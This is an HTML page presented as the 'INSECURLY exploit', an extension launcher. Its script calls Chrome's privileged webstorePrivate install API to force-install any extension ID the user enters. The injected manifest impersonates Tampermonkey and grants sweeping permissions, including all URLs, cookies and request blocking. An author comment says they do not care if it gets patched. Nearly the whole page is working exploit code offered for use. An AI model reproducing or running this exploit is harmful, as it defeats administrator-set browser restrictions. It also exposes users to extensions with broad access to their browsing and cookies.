<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>INSECURLY</title>
    <style>
        #error {
            display: none;
        }
        
        #draggable {
            display: none;
            background-color: black;
            color: white;
            padding: 10px;
            font-weight: bold;
            cursor: pointer;
        }
        
        .shown {
            display: inline-block !important;
        }
    </style>
    <!--   I personally could not care less whether this exploit gets patched -->
    <script defer>
        javascript:document.write('<center><head><h1>Extension Launcher </h1></head></center><center><h3>Instructions: Put in the id of the extension, the icon of the extension, and the name of the extension</h3></center><center><br><input id=icon placeholder="Put Extension Icon here"></br></center><center><br><input id=name placeholder="Put name here"></br></center><center><br><input id=extension maxlength=32 placeholder="Put extension id here"></br></center><center><br><button id=submit>Download</button></br><style>textarea{border-radius:25px; margin:auto;text-align:center;display:inline-block;height:400px}*{box-sizing:border-box}body{padding:13px;font-size:110%;color:#fff;background-color:#2e2e31}h1{text-align:center;font-size:70px}h2{text-align:left;font-size:175%}button,input,pre,select,textarea{border-radius:21px;color:#000;font-size:15px}h1,h2,h3,h4,button,label,p,select{font-family:Roboto,sans-serif}hr{border:none;border-bottom:3px solid #fff}input,kbd,pre,textarea{font-family:monospace;border:none}input,select,textarea{background-color:#fff;border-radius:25px;padding:13px 17px;border:none}button,input{background-color:#fff;padding:13px 100px;margin:20 5px 5px 0}input{width:600px;border-radius:25px}textarea{white-space:pre;float:center;width:60%;border-radius:25px 0 0 10px;resize:none;background-color:#99edc3;margin-bottom:15px}pre{border-radius:25 10px 10px 0;padding:13px;float:right;margin:0 0 25px;width:40%;overflow-y:scroll;word-break:break-all;white-space:pre-line;background-color:#1c8e40}button{border:none;border-radius:25px;cursor:pointer;transition:filter 250ms}button:hover{filter:brightness(.8)}.gg{background-color:#99edc3}a{color:#99edc3;transition:color 250ms}a:hover{color:#1c8e40}</style>'),document.getElementById("submit").addEventListener("click",function(){var empty=document.getElementById("extension").value;if(""==empty)alert("Must put a id");let icon=document.getElementById("icon").value,name=document.getElementById("name").value,extension=document.getElementById("extension").value;chrome.webstorePrivate.beginInstallWithManifest3({esbAllowlist:!0,iconUrl:""+icon,id:""+extension,localizedName:""+name,manifest:'{"update_url":"https://clients2.google.com/service/update2/crx","manifest_version":2,"content_security_policy":"script-src \'self\';object-src \'self\';","minimum_chrome_version":"71.0.0.0","offline_enabled":true,"content_scripts":[{"js":["page.js","content.js"],"matches":["file:///*","http://*/*","https://*/*"],"run_at":"document_start","all_frames":!0}],"browser_action":{"default_icon":{"19":"images/icon_grey19.png","38":"images/icon_grey38.png","16":"images/icon_grey16.png","24":"images/icon_grey24.png","32":"images/icon_grey32.png"},"default_title":"Tampermonkey","default_popup":"action.html"},"icons":{"32":"images/icon.png","48":"images/icon48.png","128":"images/icon128.png"},"incognito":"split","name":"Tampermonkey","short_name":"Tampermonkey","version":"4.18.0","description":"The world\'s most popular userscript manager","default_locale":"en","background":{"page":"background.html"},"options_page":"options.html","options_ui":{"page":"options.html","chrome_style":!1,"open_in_tab":!0},"commands":{"toggle-enable":{"description":"Toggle enable state"},"open-dashboard":{"description":"Open dashboard"},"open-dashboard-with-running-scripts":{"description":"Open dashboard with the current tab\'s URL used as filter"},"open-new-script":{"description":"Open new script tab"}},"permissions":["notifications","unlimitedStorage","tabs","idle","webNavigation","webRequest","webRequestBlocking","storage","contextMenus","chrome://favicon/","clipboardWrite","cookies","declarativeContent","<all_urls>"],"optional_permissions":["downloads"]}\n'},function(){chrome.webstorePrivate.completeInstall(""+extension,function(){console.log(arguments)})})},!1);
    </script>
</head>

<body>
    <h1>INSECURLY exploit (by bypassi)</h1>
    <div id="error"></div>
    <div id="draggable" draggable="true">drag this button into a new tab!</div>
</body>

</html>
